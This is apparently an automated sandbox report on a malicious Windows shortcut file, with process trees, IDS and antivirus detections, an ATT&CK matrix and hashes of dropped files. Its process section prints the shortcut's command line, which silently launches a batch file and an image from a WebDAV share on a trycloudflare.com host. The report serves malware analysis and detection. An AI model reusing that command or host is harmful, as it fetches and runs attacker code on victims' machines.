Windows
Analysis Report
dial2.Ink.lnk
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
cmd.exe (PID: 6704 cmdline:
"C:\Window s\System32 \cmd.exe" /c start " " /min \\b oy-such-ic on-positiv e.trycloud flare.com@ SSL\DavWWW Root\file. bat & star t \\boy-su ch-icon-po sitive.try cloudflare .com@SSL\D avWWWRoot\ 1.jpg MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 1412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) rundll32.exe (PID: 7496 cmdline:
"C:\Window s\system32 \rundll32. exe" ndfap i.dll,NdfR unDllDiagn oseWithAns werFile Ne tworkDiagn osticsShar ing C:\Use rs\user~1\ AppData\Lo cal\Temp\N DF1936.tmp MD5: EF3179D498793BF4234F708D3BE28633) msdt.exe (PID: 7516 cmdline:
-skip TRU E -path "C :\Windows\ diagnostic s\system\n etworking" -af "C:\U sers\user~ 1\AppData\ Local\Temp \NDF1936.t mp" -ep "N etworkDiag nosticsSha ring" MD5: 3AE6BFDF0257B303EDD695DA183C8462)
netsh.exe (PID: 7856 cmdline:
"C:\Window s\system32 \netsh.exe " trace di agnose Sce nario=Netw orkSnapsho t Mode=Net Troublesho oter MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- cleanup
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Timestamp: | 05/24/24-11:03:00.227669 |
SID: | 2052731 |
Source Port: | 50669 |
Destination Port: | 53 |
Protocol: | UDP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: |
Source: | DNS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Strings: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | LNK file: |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: | Jump to behavior |
Source: | Window detected: |
Source: | Binary string: |
Source: | Static PE information: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Lowering of HIPS / PFW / Operating System Security Settings |
---|
Source: | Process created: |
Stealing of Sensitive Information |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | |||
9% | Virustotal | Browse | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
0% | ReversingLabs | |||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
1% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
boy-such-icon-positive.trycloudflare.com | unknown | unknown | true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1447085 |
Start date and time: | 2024-05-24 11:02:08 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | dial2.Ink.lnk |
Detection: | MAL |
Classification: | mal88.rans.spyw.evad.winLNK@7/16@1/0 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description |
---|---|---|
05:02:59 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 2812 |
Entropy (8bit): | 2.9032722066306347 |
Encrypted: | false |
SSDEEP: | 24:Fo32Q1YSu+1YSqxqi88888n73qHi88887PqHi8888x+qTqj1G:umMu+M88888t88887B8888D |
MD5: | 36DCB98CF0C2F3529B7E38DD57AAF3CC |
SHA1: | 8898FBF6CAEB89793E076D42A8C8BA2FCA4A0D6B |
SHA-256: | 0AD67BE16A7C0E8C7ED63ECD43EDA71F598B857F0B91318353C979B4F697134E |
SHA-512: | 0AE136EE934038776949B1CDA4C3D043B57AA9EAECCE641389CE4BD90AEF816EA0C923E11EDABDD381FB5B536D2272887AD89E6EDDAEB9A1D7C3621771CB7D74 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 167016 |
Entropy (8bit): | 4.413051981071322 |
Encrypted: | false |
SSDEEP: | 384:X+BeLgtgFgQg7rgZgp3vFD2smEtttbkcL5Of8hj1fVh1f8hWqEfVhnq2fVhMfxhd:XLgtgFgQg7rgZgplP/s |
MD5: | 0606098A37089BDC9D644DEE1CC1CD78 |
SHA1: | CADAE9623A27BD22771BAB9D26B97226E8F2318B |
SHA-256: | 284A7A8525B1777BDBC194FA38D28CD9EE91C2CBC7856F5968E79667C6B62A9D |
SHA-512: | 0711E2FEF9FDE17B87F3F6AF1442BD46B4C86BB61C8519548B89C7A61DFCF734196DDF2D90E586D486A3B33F672A99379E8205C240BD4BCB23625FFB22936443 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 489984 |
Entropy (8bit): | 7.291387835559217 |
Encrypted: | false |
SSDEEP: | 6144:LZC0lEOC2Us6eEyAc0jbJYOjlCLHUZQsxjuaJ7oSEvcdfSc0jbJYOjlCLHUZQ:LZFLUe6vJ/wLIvavyfEvJ/wLI |
MD5: | EF3F72E162CFA6C082007672655CAE8A |
SHA1: | F6BE37340CDED395EF7C3DAB103DE4E061B05806 |
SHA-256: | 5A04D9F78BEF844FEE2FEC65610E12DB59CEFAA63544F3045401597AAE753B3C |
SHA-512: | B63D884525CC747D4DEB1335BF31A27248DD612BE9D8A1F6CA7C5F5A795964AC3B8868994CDE1EC5CD0F4C537E00EC56FB45D5250F3BEC1BFA13EE4AA1F9C52C |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 951 |
Entropy (8bit): | 5.0857751193503695 |
Encrypted: | false |
SSDEEP: | 24:Qb3DQ7NOepjIAflbfjbgTRmW26S1pGCXGiVd/ZF2GRaesBFw:mDzepZtjBtRRbCUae2q |
MD5: | C25ED2111C6EE9299E6D9BF51012F2F5 |
SHA1: | 2DEFBB5A2758AF744E3DD8AF3A4AA153A28E4713 |
SHA-256: | 8E326EE0475208D4C943D885035058FAD7146BBA02B66305F7C9F31F6A57E81B |
SHA-512: | AAC97463868162FE042748A279C38F6FB569E971E0CC0339D1A8969A7F5633EF7377B6F7DCFAE94BDD2BF96BBFF454B607EE8D7573E1C3C9569269FE82671D9E |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 770 |
Entropy (8bit): | 5.043368661106705 |
Encrypted: | false |
SSDEEP: | 24:Qb3DQ7NcIKGlbfjbgTRmW26S1pGK/KrGFxw:mDl4jBtPKH |
MD5: | 25B8543DBF571F040118423BC3C7A75E |
SHA1: | 49044724698E6964DC93ACF5BEE2A77B8EAD4133 |
SHA-256: | D78E6291D6F27AC6FEBDCF0A4D5A34521E7F033AF8875E026DF21BA7513AB64A |
SHA-512: | EC991FF552C1012209940CDCB081D64876B7989C56F07739B392DAAE9BCABA883B45AA90D50BEF31F276A9CD8492EE2B9DB700CD5E20E7B17BA43D98EC394DF5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9728 |
Entropy (8bit): | 5.0031830583187595 |
Encrypted: | false |
SSDEEP: | 192:dXcso4xinzRCxtd3wz5AstHq9Y2f0mWjeLNW:dXckCMPGz9ZYWC5W |
MD5: | 502A165A5058F93FA7F84A9FB52887CD |
SHA1: | 43C723564649244A9FB28EDFEC83F0330420CEB1 |
SHA-256: | 818DD25A449FEB9D30A108550940D3729FF1C83A8957049AA5E5EE56C89573DB |
SHA-512: | A3B2B5A5D75DBBA17348FBECE170FB94E1406789724CC35FBDE36CAC55C58310F08E580E3FE5E9D7F306DE4FD579B69704CBD5B43D048CDA0B24CEED37770163 |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: | |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsResolve.ps1
Download File
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12213 |
Entropy (8bit): | 4.649249749706581 |
Encrypted: | false |
SSDEEP: | 192:eLXYPXsa+OjfI9HIufxAey+3OG78/ce+eT5WjifrM+BK:VPXaifqdfxAey+ecmAu7k |
MD5: | D213491A2D74B38A9535D616B9161217 |
SHA1: | BDE94742D1E769638E2DE84DFB099F797ADCC217 |
SHA-256: | 4662C3C94E0340A243C2A39CA8A88FD9F65C74FB197644A11D4FFCAE6B191211 |
SHA-512: | 5FD8B91B27935711495934E5D7CA14F9DD72BC40A38072595879EF334A47F99E0608087DDC62668C6F783938D9F22A3688C5CDEF3A9AD6C3575F3CFA5A3B0104 |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsTroubleshoot.ps1
Download File
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 25783 |
Entropy (8bit): | 4.500605198321576 |
Encrypted: | false |
SSDEEP: | 384:blSoNnCiXTShob5bdVTz6rZTvxlBNexTKmh+xdxBUNQGJ:xSoTh8Jq |
MD5: | 2857343E8845EADB9B60CA0727CBDCB7 |
SHA1: | 82A5533B3739504C72F9DCE7D353845B35037DEE |
SHA-256: | 06D927AE1DB217378EA77146FDCCA66D1F1F6D90780B734B8748D1052FBD8B86 |
SHA-512: | 56B09BFBFF32B43DDD8E4636A485AF111B6DBFA2B7181299A22A3D007CF87DF0B09433100DC693C81C4F746A40F42FC51C75436511BE26270B8D84F7AC8EAD7D |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsVerify.ps1
Download File
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11079 |
Entropy (8bit): | 4.751587059666952 |
Encrypted: | false |
SSDEEP: | 192:YORm9mJWriv3iriv3oyriv3vgriv3qB3b8FnHayrBJckzrSartt0qF+rSG/rSurT:YORm9mJDv33v3oHv3lv3qB3b8FnHrrBA |
MD5: | 9B222D8EC4B20860F10EBF303035B984 |
SHA1: | B30EEA35C2516AFCAB2C49EF6531AF94EFAF7E1A |
SHA-256: | A32E13DA40AC4B9E1DAC7DD28BC1D25E2F2136B61FF93BE943018B20796F15BC |
SHA-512: | 8331337CCB6E3137B01AEEC03E6921FD3B9E56C44FA1B17545AE5C7BFCDD39FCD8A90192884B3A82F56659009E24B63CE7F500E8766FD01E8D4E60A52DE0FE67 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 567 |
Entropy (8bit): | 4.837302167759307 |
Encrypted: | false |
SSDEEP: | 12:QcM3BFN+7bxAPe/LACrfgjvj5s8x8i9OoXdEgnc8x8i9OoXdQIx:Qb3DQ7FMejjbgTNhii9dXDxii9dXOe |
MD5: | A660422059D953C6D681B53A6977100E |
SHA1: | 0C95DD05514D062354C0EECC9AE8D437123305BB |
SHA-256: | D19677234127C38A52AEC23686775A8EB3F4E3A406F4A11804D97602D6C31813 |
SHA-512: | 26F8CF9AC95FF649ECC2ED349BC6C7C3A04B188594D5C3289AF8F2768AB59672BC95FFEFCC83ED3FFA44EDD0AFEB16A4C2490E633A89FCE7965843674D94B523 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54687 |
Entropy (8bit): | 4.91902609892868 |
Encrypted: | false |
SSDEEP: | 768:AaDgc60FE2UMeV6HQEqEVBWMBaRNdKdNh5BIW6Mk7svkxtFJuAQQW:j0a4bKcW6MkcSuj |
MD5: | C912FAA190464CE7DEC867464C35A8DC |
SHA1: | D1C6482DAD37720DB6BDC594C4757914D1B1DD70 |
SHA-256: | 3891846307AA9E83BCA66B13198455AF72AF45BF721A2FBD41840D47E2A91201 |
SHA-512: | 5C34352D36459FD8FCDA5B459A2E48601A033AF31D802A90ED82C443A5A346B9480880D30C64DB7AD0E4A8C35B98C98F69ECEEDAD72F2A70D9C6CCA74DCE826A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3011 |
Entropy (8bit): | 5.393839415081681 |
Encrypted: | false |
SSDEEP: | 48:mDqbURueqlXC2ay3g+rAgeNTFNe5L9tkYnNn2E8/UBUyuzoth1GlB:mD+UR6XC2az4MjY5L9VnNnIUBUyuzoti |
MD5: | 0C75AE5E75C3E181D13768909C8240BA |
SHA1: | 288403FC4BEDAACEBCCF4F74D3073F082EF70EB9 |
SHA-256: | DE5C231C645D3AE1E13694284997721509F5DE64EE5C96C966CDFDA9E294DB3F |
SHA-512: | 8FC944515F41A837C61A6C4E5181CA273607A89E48FBF86CF8EB8DB837AED095AA04FC3043029C3B5CB3710D59ABFD86F086AC198200F634BFB1A5DD0823406B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 17408 |
Entropy (8bit): | 3.463167967348922 |
Encrypted: | false |
SSDEEP: | 96:40OJmd+VoozojEIjPe/dQTVOd5hvhHyHMVqz+4MEvTLGlyQzwv7KCbVeog3+yt41:40njnexdUMR4wgK+gWlTWy |
MD5: | 42924954580FC0B97147D18CBD9064A2 |
SHA1: | E02B93D36214FB4A98AA9B4711920541C78D5B26 |
SHA-256: | B03FC44FCB28F039F94AC63B44617E04071D1DC5A5CD15E187AA806A085EF31A |
SHA-512: | 0B2737EE5C21538B120FD975850E7899F7F1B8B7FEC49B5E9F807EBFAE62DA3EB333CDBDB65912BACA43B39D63AFBE1258C8C54CC7E8A313D108339778585B73 |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: | |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5378 |
Entropy (8bit): | 3.527173963273437 |
Encrypted: | false |
SSDEEP: | 96:i30smw/9nwbgDwlwn0iYveuQzRYkwj0pD+EijvxFvXG5B9c1rO4L:i30sZYlGe3vGfw |
MD5: | B2780BE67C909635DAEC96B9C909EC54 |
SHA1: | F4A8562D46548CBF091EB5230D2A6A3C5859BA3E |
SHA-256: | 0E7173882297619CE2097133B9D5C69D69B29997C39A5CBC4A88247C580642C5 |
SHA-512: | 8576D3313963A814870995FDE92F739A786ED7F93578F190DE07308E1DD66A8F511D4E06733298A250AAF48B64404DE4F99B03079B97FC33CDC3C798EAD0AFD0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 48956 |
Entropy (8bit): | 5.103589775370961 |
Encrypted: | false |
SSDEEP: | 768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO |
MD5: | 310E1DA2344BA6CA96666FB639840EA9 |
SHA1: | E8694EDF9EE68782AA1DE05470B884CC1A0E1DED |
SHA-256: | 67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C |
SHA-512: | 62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\netsh.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 116 |
Entropy (8bit): | 4.625060946214589 |
Encrypted: | false |
SSDEEP: | 3:lwFL5WvFN0Ked18SARJOaKWR6WEMYV3Cwv:laWv3ed1/A7OXMICwv |
MD5: | EA30C563F5D70CB0C4232D692B93346E |
SHA1: | F0D28A8CACDFD35B2587F3F673E748100DBC28D6 |
